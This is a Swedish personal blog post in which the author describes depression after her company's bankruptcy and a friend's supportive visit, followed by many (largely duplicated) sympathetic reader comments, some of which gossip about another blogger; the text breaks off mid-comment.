Som en ängel från ovan!

OLYMPUS DIGITAL CAMERA

Denna kvinnan! Denna superwoman! En ängel från ovan?

Någon som dyker upp när man står och försöker behålla balansen på ruinens brant. När man kämpar dag som natt med att inte falla över kanten…

Någon som av egna erfarenheter förstår varenda känsla, varenda tvivel, varenda rädsla. Som förstår sorgen, besvikelsen, förvirringen, tröttheten, utmattningen. Någon som förstår till 100%. Nej, hon är ingen ”hägring” eller dröm. Hon finns på riktigt! TACK ANNELIE för ditt ovärdeliga stöd!

Jag träffade Annelie för 3-4 år sedan i samband med en modevisning för Love Forever. Under åren har vi träffats genom middagar, mingel och företags möten. Jag klickade direkt med Annelie första gången som vi sågs. Sen har vi hållt kontakten och träffats till och från…. Annelie är precis som jag själv en driven, målmedveten entreprenör. Hon har varit ”känd” som Annelie-inreda i många år. i 17 år har hon kämpat med sitt livsverk, sin dröm, sitt jobb, sin ambition. I 17 år har hon byggt upp sitt företag, blivit ”ett” med sitt företag och varumärke. ( du kan kika närmare på det HÄR ). Men det har inte alltid varit en dans på rosor för henne heller. Så är det med förtag, stora som små. Så är det ju med livet också, det gå upp och det går ner. Man lär sig nya saker på vägen, och man hamnar inför olika vägsjäl. På alla plan.

Annelie har också varit med om en liknande situation. Hon har alltså egna erfarenheter av just samma sak.

Jag hade ingen aning om vad hon gått igenom. Hon skrev till mig för några veckor sedan och ville prata md mig innan ja skulle ta mitt beslut. jag såg först inte meddelandet, jag var stressad, forcerad och extremt pressad. Så det tog ett tag innan jag återkopplade….

Några långa telefon dejter senare så finns det inga ord som rättvist beskriver min tacksamhet över att hon dök upp just precis när hon gjorde det. VI har ju kännt varandra ganska länge men, jag hade ingen aning om vad just hon gått igenom.

Det var hon som i förrgår gav mig rådet jag tidigare nämnde ”skit i skiten, åk till Terece så kommer jag imorgon” Dvs kaoset i mitt hem… (bild i tidigare inlägg) 

Men dra mig baklänges vilken kvinna! Igår dök hon upp här hemma hos mig i Sigtuna. -jag är här nu! sa hon med ett varmt leende. Med sig hade hon en korg, med presenter till både mig och Lilleman. Fina varma kärleksfulla koppar, glas, skålar och skedar från rice. Med färg. -My, du behöver färg! ( Allt är beige hos mig, nästan… ) Stor badlakan från Odd Molly home  M.m. 

Mitt kaos artade hem återspeglar mitt inre kaos. Kan inte vara tydligare med just det. Vissa av er skrev att ”det är bara att städa”.

Det är INTE ”bara” att städa. Att kliva upp ur sängen är svårt just nu. Att andas är tom svårt just nu! Att äta, att tänka. Dom mest vardagliga sakerna blir en tung uppförsbacke! Jag hade inte kunnat föreställa mig hur det kändes att må såhär. Depression, utmattning, psykiskohälsa. Allt är så tabubelagt! Precis som med konkursen! Det ska hyschas, tystas ner, mörkläggas.

Men det är ju så jag mår, det är vad jag går igenom just nu! Det är SKIT jobbigt, jag mår skit dåligt! Med det sagt så kommer det inte att vara så för alltid. jag kommer komma upp igen! Jag vet bara inte riktigt, hur eller när. Det är det jag försökt att ta reda på just nu. Ett  sätt att ”överleva” detta och klara av vardagen och hitta mig själv igen…. 

Jag är ledsen, sårad och deprimerad. Jag skäms inte för det. Det är så det är. Jag jobbar på det. jag försöker att ta kontrollen över mig själv och mina känslor. Ett steg i taget.

OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA

Vi fikade ute  i trädgården… Lilleman fick bla Pennor att färglägga stora fina ark med en massa skojiga figurer. Men det var inte vilka pennor som helst det var pennor med suddbart bläck! -Hur kul? Inte nog med alla presenter, Hon var hos oss, närvarande, lekte med Ludvig, som verkligen fastnade för Annelie på en gång. Trots att det var första gången som dom träffades….. Vi satt i  timmar och pratade. Hon är klok, erfarenheter och en genuin kvinna med hjärtat på rätt plats <3 

OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA IMG_7949

När vi suttit och fikat läääänge. Så gick vi in. Hon började organisera upp. Mitt kaos, mig och min röra. Jag fick då energi att själv ta tag i det. tack vara att hon var hos mig och på ett magiskt sätt gav mig energi. Jag som normalt sett är på gränsen till pedant, levder  just nu i ett kaos! obäddad säng, Alltså inga lakan als!

5 resväskor som var o-upp packade. flyttkartonger med grejer från kontoret som agerat lager sista 7 åren…. dammråttor ÖVERALLT!

Olika högar, ”sälj, slänga, ge bort” ”vår, sommar, vinter” osv….. Jag hade ALDRIG orkat göra detta själv. Vanliga ting som jag normalt sett inte ens reflekterar över, blir just nu övermäktigt.

Som jag skev för några veckor sedan efter att jag haft min första riktiga panikångest attack så satt jag framför min tomma resväska och kunde ändå inte förmå mig att packa den… Jag som i 15 år varit på resande fot är ju expert på att packa?! Men det gick bara inte. Jag är inte mig själv nu. det jag genomgår just nu är en ren j*vla mardröm! Jag vet inte vart framtiden bär mig…. jag vet inte vad jag ska göra med allt, jag vet inte ens när själva konkursen är klar! jag vet i stort sett ingenting just nu.

Men Annlie sa många kloka saker idag, men just en väldigt kloka sak ”-Du behöver inte bestämma det idag… inte närmaste tiden” Jag har alltid så bråttom med allt. lösa, laga och fixa problemen. Men ibland måste man låta tiden ha sin gång. DET är en rejäl utmaning! Tålamod har aldrig varit min starka sida! Ovisshet har alltid stressat mig, nu mer än någonsin! För att inte tala om hur hon plötsligt tog intuitiv till att laga middag till Lilleman. Dammsuga hela min lägenhet, lägga en plan för hur jag ska ta tag i små saker, steg för steg… När min energi försvann så lyfte hon upp…….. Tusen, TUSEN tack! 

Min värsta tid på dygnet just nu är på morgonen, jag vaknar och har ingen tid att passa…. Det känns lite som om jag saknar mening.

Tack gode gud att Lilleman är hos mig just nu. lilleman gör mig stark! <3 OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERAFörra veckan i fredags tror jag….. jag lämnade Öland efter att jag sagt ”hej då” till butiken ( första gången, blev dit kallad gen) Jag bestämde mig för att åka till Min gamla styvmamma och min barndomsvän som båda bor i Timmernabben. Jag var HELT knäckt. rödgråten, svullen, frusen, trött och grinade samtidigt om jag körde. Tankmätaren lyste rött. Fan, hade glömt att jag behövde tanka. jag befinner mig då på landsväg utanför Kalmar. Det är grått, mulet och regnet hänger i luften. Jag stannar till och ska tanka med mitt tankkort. Der skulle finnas ca 740:- till godo. Jag sätter i för att tanka. Det funkar inte. Jag gör några försök till. Men det går inte. Då tar jag nästa kort. ”MEDGES EJ”.  och nästa… samma sak! SHIT! ALLT är spärrat! Såklart, allt som haft med bolaget att göra spärras automatiskt när man går i konkurs.

Okay, ingen panik tänkte jag, lugn och fin nu…. och börjar gräva efter mobilen för att få fram bank-id och flytta pengar från mitt sparkonto till mitt ”löne” konto. Men nej….. mobil j*veln var ju spärrad pga av en FELAKTIG hantering hos Telenor. -Åhhhh gud!  SATANS, HELVETES, J*VLA SKIT! Jag försökte övertyga mig själv för att inte bryta ihop att allt skulle ordna sig. Jag tittar upp mot den gråa himlen, och då öppnar sig himlen och regnet vräker ner.

jag står alltså mitt ute i ingenstans, på landet. Inte en människa så långt ögat kan nå. jag sätter mig i bilen och slår hysteriskt på stackars ratten, svär och gråter och better mig som en hysterisk 3-åring!

DÅ dyker upp en bil men en farbror i. jag börjar i panik att gräva igenom handväskan, jackor och hela bilen efter kontanter. Jag går skamsen, BLÖT och rödgråten ut till farbrorn och förklarar att jag inte har något fungerande kort och frågar om han kunde tanka åt mig och jag gav honom mina kontanter. 157:- hittade jag. Han ställde upp, utan att blinka. Han tankade för 200 kronor och jag fick panik igen och försökte stoppa honom. han klappade mig på axeln, förklarade att han läst tidningen och önskade mig lycka till.

Jag stod chockad kvar, men tacksam för hans hjälp <3

Det räckte så att jag tog mig till Timmernabben. Hem till min x-styvmamma Christin & till min barndomsvän Louise där jag gömde mig några dagar… Underbara människor! <3

Alltså jag säger då det. När hela havet stormar så ser man verkligen vilka som finns där. Nu i dagarna så har mina leverantörer vaknat till liv. En efter en hör dom av sig och tackar. Ger mig lovord och respekt för att jag ”lämnat in” utan skulder. Varma, omtänksamma ord och lyckönskningar.

DET är sådant som just nu betyder så GRYMT mycket! Era kommentarer, ett litet sms, en liten omtanke…. Just nu är jag inte den där glada, peppande, inspirerande My som du är van att följa. Men jag kommer att komma tillbaka, starkare än någonsin! Så småningom…. Kramar

/ My Martens 

131 Komentarer

 1. Vill skicka dig en kram, det är bra att du i te är så hörd mot dig själv och pressar på. Det gäller att du är snäll mot dig och att det är OK att må som du gör. Bara det är ett tecken på att du blir bättre. Jättefint att du också har en vän som kliver inoch gör saker för dig inte bara säger! Kram igen

 2. Vilken fin vän…umgås med dom som ger dej energi.
  Vet hur tufft det är med att driva eget företag.
  Det har varit upp och ner… tillsammans med min man i 36 år ?
  Du är en Pippi Långstrump du kommer att fixa det…Kram

 3. Vilken fin medmänniska och vän Annelie är. All respekt till henne. Och även en fin man du träffade som hjälpte dig med tankningen. En dag då du är på fötter igen så gör du samma ska för en människa i nöd. Kramar.

 4. My… En sak som kommer att visa sig nu är vilka vänner som är på riktigt. Min mamma blev sjuk och dog samtidigt som min pappa fick stroke och blev dålig. Där och då var det många sk vänner som inte tyckte att det var kul längre.. Den glada, pigga, spontana och roliga Anna var inte där, och då var det många som visade sitt rätta jag. Jag var helt knäckt och helt otröstlig. Men långsamt vaknade tigern och överlevaren i mig och jag kan nu se tillbaka på den tiden och se allt jag fått och lärt mig av det svåra. Mina riktiga få vänner är jag otroligt tacksam för! Denna tjej som kom till dig verkar vara en sån vän, var rädd om henne. Som lyfter en när man inte orkar resa sig.. Jag tror att du kommer att gå stärkt ur detta, sakta men säkert kommer en ”ny” My resa sig och vara mer starkare än du nånsin kunnat ana. Tänker på dig!! Många kramar Anna

 5. Vilken underbar vän! Du är inte ensam My och vi, dina läsare finns kvar! För du kommer tbx och det med stora steg.
  Då kan de som förödmjukar och fryser ut dig tappa hakan!
  Oh vad glad jag är för din skull att en RIKTIG vän ställde upp för dig o inte att förglömma farbrorn som hjälpte dig att tanka. Kram fina du

 6. Men åh vilka änglar det finns och så fina saker du fick. Fast jag inte känner dig så blir jag genuint glad att du fick hjälp att städa lite i röran. Behövs så lite för att man ska klara sig över vattenytan. Stor kram <3

 7. Fina lilla gumman! Ja, jag säger så, för jag är så gammal att jag skulle kunna vara din mamma….!
  När jag läser detta inlägg så rinner mina tårar DÅ jag tycker såå synd om dig. Det känns som om du är ganska ensam just nu.. Nu när du verkligen skulle behöva alla dina ”vänner”.. Men vilken underbar kvinna som kom när du som bäst behöver det. Snacka om en riktig vän SÅ gulligt av henne. Och farbrorn som hjälpte dig med bensinen, oxå en ängel. Där ser du, My, KARMA när den visar sig på det rätta sättet. Du är värd det bästa SÅ som DU har kämpat med detta helvete ( rent ut sagt ). Nu hoppas jag att dina panikattacker slutar snart ANNARS måste du lova mig att gå till läkaren….! För jag vet hur det är och jag vill inte du ska få samma helvete som jag har haft i måååånga år.
  Nu önskar jag dig och lilleman en mysig kväll / Kram på dig

 8. Två Ann här ? äldst troligen.
  Jag läser en del bloggar men med åren har jag lärt mej
  att skilja på falskhet ytlighet och äkta.
  Kanske bra med variation:)

 9. Vilken fin vän <3 som kom till dig när du som mest behöver det. Som tar kommando o tar tag i saker. Kram till henne o till dig oxå givetvis <3

 10. Åh en sån fin vän, snällt och omtänksamt av henne och så fick hon bra reklam för sitt företag av dig. Du är ändå lyckligt lottad i eländet som har många vänner och du har även föräldrar och så vovven och sonen. Inte en enda gång har någon kommit och hjälpt mig i mitt kaos och röra som blivit efter långvarig depression..och föräldrar har jag inga längre…så du ska känna dig tacksam ändå och det är du säkert. Att du vet att det är tillfälligt och att du kommer tillbaka starkare än någonsin låter positivt, det tyder på att du inte sjunkit såå långt ner…är man djupt nere i depression så vet man att man aldrig helt reser sig och aldrig helt blir sig själv igen. Du vet nog vad du gör och kommer säkerligen komma tillbaka med full kraft. <3

 11. Vill skicka dig en kram, det är bra att du i te är så hörd mot dig själv och pressar på. Det gäller att du är snäll mot dig och att det är OK att må som du gör. Bara det är ett tecken på att du blir bättre. Jättefint att du också har en vän som kliver inoch gör saker för dig inte bara säger! Kram igen

 12. Sänder styrka till dig. Och skönt det finns fina vänner runt dig . Det är verkligen det du behöver nu . Det är nu man märker vilka som är ens riktiga vänner . Umgås du inte med magdalena g längre? Verkar ju ha sån fin vänskap . Du behöver inte svara men var bara tvungen att fråga. Många kramar till dig. Du kommer klara dig igenom detta. Du är starkare än vad du tror. <3

 13. Vilken fin vän…umgås med dom som ger dej energi.
  Vet hur tufft det är med att driva eget företag.
  Det har varit upp och ner… tillsammans med min man i 36 år 🙂
  Du är en Pippi Långstrump du kommer att fixa det…Kram

 14. Vilken fin medmänniska och vän Annelie är. All respekt till henne. Och även en fin man du träffade som hjälpte dig med tankningen. En dag då du är på fötter igen så gör du samma ska för en människa i nöd. Kramar.

 15. My… En sak som kommer att visa sig nu är vilka vänner som är på riktigt. Min mamma blev sjuk och dog samtidigt som min pappa fick stroke och blev dålig. Där och då var det många sk vänner som inte tyckte att det var kul längre.. Den glada, pigga, spontana och roliga Anna var inte där, och då var det många som visade sitt rätta jag. Jag var helt knäckt och helt otröstlig. Men långsamt vaknade tigern och överlevaren i mig och jag kan nu se tillbaka på den tiden och se allt jag fått och lärt mig av det svåra. Mina riktiga få vänner är jag otroligt tacksam för! Denna tjej som kom till dig verkar vara en sån vän, var rädd om henne. Som lyfter en när man inte orkar resa sig.. Jag tror att du kommer att gå stärkt ur detta, sakta men säkert kommer en ”ny” My resa sig och vara mer starkare än du nånsin kunnat ana. Tänker på dig!! Många kramar Anna

 16. Vilken underbar vän! Du är inte ensam My och vi, dina läsare finns kvar! För du kommer tbx och det med stora steg.
  Då kan de som förödmjukar och fryser ut dig tappa hakan!
  Oh vad glad jag är för din skull att en RIKTIG vän ställde upp för dig o inte att förglömma farbrorn som hjälpte dig att tanka. Kram fina du

 17. Men åh vilka änglar det finns och så fina saker du fick. Fast jag inte känner dig så blir jag genuint glad att du fick hjälp att städa lite i röran. Behövs så lite för att man ska klara sig över vattenytan. Stor kram <3

 18. Fina lilla gumman! Ja, jag säger så, för jag är så gammal att jag skulle kunna vara din mamma….!
  När jag läser detta inlägg så rinner mina tårar DÅ jag tycker såå synd om dig. Det känns som om du är ganska ensam just nu.. Nu när du verkligen skulle behöva alla dina ”vänner”.. Men vilken underbar kvinna som kom när du som bäst behöver det. Snacka om en riktig vän SÅ gulligt av henne. Och farbrorn som hjälpte dig med bensinen, oxå en ängel. Där ser du, My, KARMA när den visar sig på det rätta sättet. Du är värd det bästa SÅ som DU har kämpat med detta helvete ( rent ut sagt ). Nu hoppas jag att dina panikattacker slutar snart ANNARS måste du lova mig att gå till läkaren….! För jag vet hur det är och jag vill inte du ska få samma helvete som jag har haft i måååånga år.
  Nu önskar jag dig och lilleman en mysig kväll / Kram på dig

 19. Två Ann här 🙂 äldst troligen.
  Jag läser en del bloggar men med åren har jag lärt mej
  att skilja på falskhet ytlighet och äkta.
  Kanske bra med variation:)

 20. Vilken fin vän <3 som kom till dig när du som mest behöver det. Som tar kommando o tar tag i saker. Kram till henne o till dig oxå givetvis <3

 21. Har följt dig o din blogg några månder, gör ont i hjärtat o se hur du kämpar o försöker men ändå tagit ett sådan svårt beslut. Det är nu som de riktiga vännerna står vid ens sida utan att man bett om det om stöd. Härliga vänner!! Kämpa på, du kommer vidare trots det är mattsvart just nu.

 22. Åh en sån fin vän, snällt och omtänksamt av henne och så fick hon bra reklam för sitt företag av dig. Du är ändå lyckligt lottad i eländet som har många vänner och du har även föräldrar och så vovven och sonen. Inte en enda gång har någon kommit och hjälpt mig i mitt kaos och röra som blivit efter långvarig depression..och föräldrar har jag inga längre…så du ska känna dig tacksam ändå och det är du säkert. Att du vet att det är tillfälligt och att du kommer tillbaka starkare än någonsin låter positivt, det tyder på att du inte sjunkit såå långt ner…är man djupt nere i depression så vet man att man aldrig helt reser sig och aldrig helt blir sig själv igen. Du vet nog vad du gör och kommer säkerligen komma tillbaka med full kraft. <3

 23. Hej!! Lider så mkt med dig och hoppas att du sakta men säkert hittar dig i allt igen. Vet att allt tar sin tid. Jag känner dig ej men läser din blogg varje dag och önskar att en cyber kram skänker dig någon glädje. Jag glädjs åt att du har vänner som ställer upp för dig. Dock såg jag i något tidigare inlägg att du har någon anonym som vet saker om dig. Och du undrade vem detta var. Jag hoppas så att de som nu ställer upp för dig verkligen menar väl, då jag läst på din blogg hur illa Toftby behandlat dig och hon brukar ju nämna vissa hon känner på sin blogg och det finns ju kopplingar där… Jag hoppas så att ingen i din närhet gör dig illa utan verkligen står upp för dig och stöttar dig och inte prata bakom ryggen. Vill inget elakt nu utan vill bara vara mån om dig, trots att jag ej känner dig. Men som många andra påpekat det är NU dina riktiga vänner syns. För samtidigt som du började må dåligt och hade dina bekymmer med affären började Toftby synas mer och mer hos dina vänner, en tillfällighet eller… Detta har andra och kommenterat hos dig. Det gör ont i mig att se att DU själv får kämpa kämpa varje dag. Trots att jag bara läser din blogg skulle jag så gärna vilja hjälpa dig, för du skriver din sanning och står upp för dig själv och andra i olika sammanhang. Du visar att DU kan, vill och är en härlig människa och även om du inte tro det själv så ta en dag i sänder, bestäm små mål för varje dag. Tex äta, klä på dig, ut och gå och njut av livet med lillen och voven. Be nära vänner om hjälp när du behöver de, för de ställer upp om de är dina vänner. Vet att många goda tips/råd innan har skrivits i kommentarerna, använd/testa de du vill, kanske något kan hjälpa dig med små myrsteg för tänk små mål och inte stora. Allt behövs bearbetas och du bör på mycket nu. Ta hand om DIG, voven och lillen!!! Många många varma kramar från mig

  • Det är otroligt att inte fler har genomskådat denna Toftby än,
   med sina ständiga pikar och sitt sluga lismande beteende i syfte att vinna personliga fördelar. Så falskt och pinsamt genomskinligt.

   • Ja när ska Toftbys lik i garderoben ramla ut. Falsk som vatten och så länge hon stryks medhårs är hon ”ärlig och genuin”. Svara emot henne eller något som inte blir till vinning för hennes ”kändisskap”, så ber hon folk att dra åt xxx-vete

    • SÅ SANT inte för att My’s fina blogg ska handla om denna människa som gör allt för att hålla sig kvar i rampljuset fy.

   • Jag följer många bloggar från och till och i synnerhet Johannas. Tycker att hon har den bästa bloggen. Massor av inspiration ang allt möjligt. Personligen så känner jag.att hon är i det absoluta toppskiktet utav bloggare. Just nu följer jag en resa hon gör och vi har redan börjat planera här hemma att göra en likadan nästa år. Läs hennes blogg och se! Kram

    • Eva det är upp till var och en vilken blogg man vill följa.
     Nu är vi många som väljer att följa Mys…..resa.
     För mej känns denna äkta till skillnad från många andras.

     • Hej! Självklart är det så. Vi följer de vi vill följa. Det är därför jag inte förstår varför en del skriver om Johanna. Hon har ju ändå inget med My’s resa att göra. Jag ser dom som två helt olika personer med olika bloggar. Tycker inte riktigt om när man måste skriva illa om någon som inte alls har med saken att göra. Hoppas att du förstår vad jag menar.

     • Eva jag är inte född igår. Men att man kan läsa mellan rader på
      vissa bloggar ger jag inget för. I min värld är det mobbing…..vuxna människor?? Sen kanske vissa har bekräftelsebehov!
      Det är mitt modershjärta som helst inte vill vara med om det. Inte så konstigt att världen ser ut som den gör.

  • Instämmer med ovanstående. My du ska veta att vi är många som står bakom dig.
   Har läst dig länge och följt dig i ur och skur men vet att du klarar detta med glans . Men det blir jobbigt det förstår vi men du klarar detta.
   Nu håller vi alla tummar och tår och kämpar tillsammans för dig och Ludvig.
   Många kramar till er båda

 24. Sänder styrka till dig. Och skönt det finns fina vänner runt dig . Det är verkligen det du behöver nu . Det är nu man märker vilka som är ens riktiga vänner . Umgås du inte med magdalena g längre? Verkar ju ha sån fin vänskap . Du behöver inte svara men var bara tvungen att fråga. Många kramar till dig. Du kommer klara dig igenom detta. Du är starkare än vad du tror. <3

 25. Vilken fin vän som gör helt rätt och stöttar dig nu! Va rädd om henne, hoppas du snart får må bättre – tänker på dig, kram!

 26. Härligt med en sådan fin vän. Var rädd om henne. Varför ställer inte Maggan upp för dig längre? Du ställde ju upp för henne när hon hade det tufft med sonens bortgång. Kram

 27. Härligt att se hur glad du ser ut på bilden i trädgården ,när Anneli & du fikar <3
  Stor kram till dig och Lilleman & en nospuss till din underbart vackra & trogna vän Tess

 28. Har följt dig o din blogg några månder, gör ont i hjärtat o se hur du kämpar o försöker men ändå tagit ett sådan svårt beslut. Det är nu som de riktiga vännerna står vid ens sida utan att man bett om det om stöd. Härliga vänner!! Kämpa på, du kommer vidare trots det är mattsvart just nu.

 29. Herrejisses vilken djäkla fin kompis du har som kom hem till dig, med sådan omtanke, å andra sidan, måste betyda att en mycket fin och go människa uppskattar och gillar dig.
  Och vi läsare gillar dig, för att du är ÄKTA! Inte tillgjord, du behöver inte göra pajas av dig på bilder eller kommentarer för att bli omtyckt, du är så himla jordnära, och det märks också vilken fin mamma du är, äkta mammakärlek. Pappan till din son ska vara väldigt glad och tacksam att han har dig som mor till hans son.
  Fy faen vilken skit du har gått igenom från alla håll och kanter. Bara detta att föda ett barn samtidigt som pappan skaffar barn med en annan?? Herregud, HUR överlevde du? Fy faen vilket svek, vilken skit du har fått uppleva.
  Finner inga ord för alla som har svikit dig!
  Stå på dig, du är bäst!

 30. Hej!! Lider så mkt med dig och hoppas att du sakta men säkert hittar dig i allt igen. Vet att allt tar sin tid. Jag känner dig ej men läser din blogg varje dag och önskar att en cyber kram skänker dig någon glädje. Jag glädjs åt att du har vänner som ställer upp för dig. Dock såg jag i något tidigare inlägg att du har någon anonym som vet saker om dig. Och du undrade vem detta var. Jag hoppas så att de som nu ställer upp för dig verkligen menar väl, då jag läst på din blogg hur illa Toftby behandlat dig och hon brukar ju nämna vissa hon känner på sin blogg och det finns ju kopplingar där… Jag hoppas så att ingen i din närhet gör dig illa utan verkligen står upp för dig och stöttar dig och inte prata bakom ryggen. Vill inget elakt nu utan vill bara vara mån om dig, trots att jag ej känner dig. Men som många andra påpekat det är NU dina riktiga vänner syns. För samtidigt som du började må dåligt och hade dina bekymmer med affären började Toftby synas mer och mer hos dina vänner, en tillfällighet eller… Detta har andra och kommenterat hos dig. Det gör ont i mig att se att DU själv får kämpa kämpa varje dag. Trots att jag bara läser din blogg skulle jag så gärna vilja hjälpa dig, för du skriver din sanning och står upp för dig själv och andra i olika sammanhang. Du visar att DU kan, vill och är en härlig människa och även om du inte tro det själv så ta en dag i sänder, bestäm små mål för varje dag. Tex äta, klä på dig, ut och gå och njut av livet med lillen och voven. Be nära vänner om hjälp när du behöver de, för de ställer upp om de är dina vänner. Vet att många goda tips/råd innan har skrivits i kommentarerna, använd/testa de du vill, kanske något kan hjälpa dig med små myrsteg för tänk små mål och inte stora. Allt behövs bearbetas och du bör på mycket nu. Ta hand om DIG, voven och lillen!!! Många många varma kramar från mig

  • Det är otroligt att inte fler har genomskådat denna Toftby än,
   med sina ständiga pikar och sitt sluga lismande beteende i syfte att vinna personliga fördelar. Så falskt och pinsamt genomskinligt.

   • Ja när ska Toftbys lik i garderoben ramla ut. Falsk som vatten och så länge hon stryks medhårs är hon ”ärlig och genuin”. Svara emot henne eller något som inte blir till vinning för hennes ”kändisskap”, så ber hon folk att dra åt xxx-vete

    • SÅ SANT inte för att My’s fina blogg ska handla om denna människa som gör allt för att hålla sig kvar i rampljuset fy.

   • Jag följer många bloggar från och till och i synnerhet Johannas. Tycker att hon har den bästa bloggen. Massor av inspiration ang allt möjligt. Personligen så känner jag.att hon är i det absoluta toppskiktet utav bloggare. Just nu följer jag en resa hon gör och vi har redan börjat planera här hemma att göra en likadan nästa år. Läs hennes blogg och se! Kram

    • Eva det är upp till var och en vilken blogg man vill följa.
     Nu är vi många som väljer att följa Mys…..resa.
     För mej känns denna äkta till skillnad från många andras.

     • Hej! Självklart är det så. Vi följer de vi vill följa. Det är därför jag inte förstår varför en del skriver om Johanna. Hon har ju ändå inget med My’s resa att göra. Jag ser dom som två helt olika personer med olika bloggar. Tycker inte riktigt om när man måste skriva illa om någon som inte alls har med saken att göra. Hoppas att du förstår vad jag menar.

     • Eva jag är inte född igår. Men att man kan läsa mellan rader på
      vissa bloggar ger jag inget för. I min värld är det mobbing…..vuxna människor?? Sen kanske vissa har bekräftelsebehov!
      Det är mitt modershjärta som helst inte vill vara med om det. Inte så konstigt att världen ser ut som den gör.

  • Instämmer med ovanstående. My du ska veta att vi är många som står bakom dig.
   Har läst dig länge och följt dig i ur och skur men vet att du klarar detta med glans . Men det blir jobbigt det förstår vi men du klarar detta.
   Nu håller vi alla tummar och tår och kämpar tillsammans för dig och Ludvig.
   Många kramar till er båda

 31. Vilken fin vän som gör helt rätt och stöttar dig nu! Va rädd om henne, hoppas du snart får må bättre – tänker på dig, kram!

 32. Läser din blogg då och då. Du inspirerar mig för ditt driv och din ärlighet. Känner med dig i allt du genomgår just nu..
  Änglar finns❤ Allt har en mening❤
  Och det kommer att öppnas nya dörrar för dig.. Vila, återhämta dig.. Vandra.. Var ute i naturen.. Vid havet.. Testa Yin-yoga..
  Varm kram❤

 33. Härligt med en sådan fin vän. Var rädd om henne. Varför ställer inte Maggan upp för dig längre? Du ställde ju upp för henne när hon hade det tufft med sonens bortgång. Kram

 34. Härligt att se hur glad du ser ut på bilden i trädgården ,när Anneli & du fikar <3
  Stor kram till dig och Lilleman & en nospuss till din underbart vackra & trogna vän Tess

 35. Herrejisses vilken djäkla fin kompis du har som kom hem till dig, med sådan omtanke, å andra sidan, måste betyda att en mycket fin och go människa uppskattar och gillar dig.

  Och vi läsare gillar dig, för att du är ÄKTA! Inte tillgjord, du behöver inte göra pajas av dig på bilder eller kommentarer för att bli omtyckt, du är så himla jordnära, och det märks också vilken fin mamma du är, äkta mammakärlek. Pappan till din son ska vara väldigt glad och tacksam att han har dig som mor till hans son.

  Fy faen vilken skit du har gått igenom från alla håll och kanter. Bara detta att föda ett barn samtidigt som pappan skaffar barn med en annan?? Herregud, HUR överlevde du? Fy faen vilket svek, vilken skit du har fått uppleva.

  Finner inga ord för alla som har svikit dig!

  Stå på dig, du är bäst!

 36. Läser din blogg då och då. Du inspirerar mig för ditt driv och din ärlighet. Känner med dig i allt du genomgår just nu..
  Änglar finns❤ Allt har en mening❤
  Och det kommer att öppnas nya dörrar för dig.. Vila, återhämta dig.. Vandra.. Var ute i naturen.. Vid havet.. Testa Yin-yoga..
  Varm kram❤

 37. Å vilken underbar vän som finns för dig när du inte mår bra. Skönt att omge sig med personer som ger energi och inte tar energi. Å jag skulle bara vilja ge dig en bamsekram. Jag tror på dig, styrkan kommer komma och då är du starkare än någonsin. Kram Anna

 38. Vad glad jag blir när jag ser att i alla fall nån av de gamla vännerna fortfarande finns för dig.
  Känns annars som att många har svikit dig just nu.
  Kan inte förstå varför man plötsligt knappt har några vänner kvar,
  men i nöden prövas vännen sägs det ju och det är det som händer dig nu, tyvärr.
  Har du dina andra jobb kvar ?
  Lycka till. Hälsningar Skåne.

 39. Å vilken underbar vän som finns för dig när du inte mår bra. Skönt att omge sig med personer som ger energi och inte tar energi. Å jag skulle bara vilja ge dig en bamsekram. Jag tror på dig, styrkan kommer komma och då är du starkare än någonsin. Kram Anna

 40. Vad glad jag blir när jag ser att i alla fall nån av de gamla vännerna fortfarande finns för dig.
  Känns annars som att många har svikit dig just nu.
  Kan inte förstå varför man plötsligt knappt har några vänner kvar,
  men i nöden prövas vännen sägs det ju och det är det som händer dig nu, tyvärr.
  Har du dina andra jobb kvar ?
  Lycka till. Hälsningar Skåne.

 41. Fantastisk vän! Det tar lång tid,många år att bygga upp en utbrändhet, kroppen behöver den tid det krävs. Mitt tips är att lyssna inåt, gå på kbt, ,spikmatta, yoga (andningen) och försöka göra saker man mår bra av och träffa de man mår bra av. Jag var också pedant (är det fortf. såklart till en viss del) Jag skulle alltid ha det fint hemma, på fredagar skulle det vara handlat, städat, tvättat m.m jag lärde mig genom kbt att det är okej ändå. I dag tittar jag på tvätthögen och tänker att jag tar det i morgon, idag ska jag göra andra saker, man behöver inte göra allt på en gång. Min kropp säger fortfarande ifrån (det var 7 års en jag var utbränd) på olika sätt, spänningshuvudvärk och ibland början till panikångest. Jag hanterar det nu och inser och tackar kroppen för att den säger i från, då drar jag ner på tempot och tränar och tränar på att säga nej till saker jag inte orkar. Jag tar några dagars återhämtning, tänker lite mer på mig själv, går på massage, ligger på spikmatta, promenerar och kommer igen och mår bra. Kroppen är fantastisk, du behöver tid och det går inte att stressa fram. Men jag tror på att hitta sina egna saker som man mår bra av och får lite energi av. Du är en driven person har kört på hårt i så många år, och det behöver man när man har eget företag och är ensamstående. Men nu har du möjlighet när du inte har kvar företaget, att återhämta dig. Du kommer att fixa det här, ha tålamod <3

 42. Styrka till dig…skönt att se att du har fina vänner
  Kan det ha med pengar att göra med de som vält sig ryggen till…

 43. Fantastisk vän! Det tar lång tid,många år att bygga upp en utbrändhet, kroppen behöver den tid det krävs. Mitt tips är att lyssna inåt, gå på kbt, ,spikmatta, yoga (andningen) och försöka göra saker man mår bra av och träffa de man mår bra av. Jag var också pedant (är det fortf. såklart till en viss del) Jag skulle alltid ha det fint hemma, på fredagar skulle det vara handlat, städat, tvättat m.m jag lärde mig genom kbt att det är okej ändå. I dag tittar jag på tvätthögen och tänker att jag tar det i morgon, idag ska jag göra andra saker, man behöver inte göra allt på en gång. Min kropp säger fortfarande ifrån (det var 7 års en jag var utbränd) på olika sätt, spänningshuvudvärk och ibland början till panikångest. Jag hanterar det nu och inser och tackar kroppen för att den säger i från, då drar jag ner på tempot och tränar och tränar på att säga nej till saker jag inte orkar. Jag tar några dagars återhämtning, tänker lite mer på mig själv, går på massage, ligger på spikmatta, promenerar och kommer igen och mår bra. Kroppen är fantastisk, du behöver tid och det går inte att stressa fram. Men jag tror på att hitta sina egna saker som man mår bra av och får lite energi av. Du är en driven person har kört på hårt i så många år, och det behöver man när man har eget företag och är ensamstående. Men nu har du möjlighet när du inte har 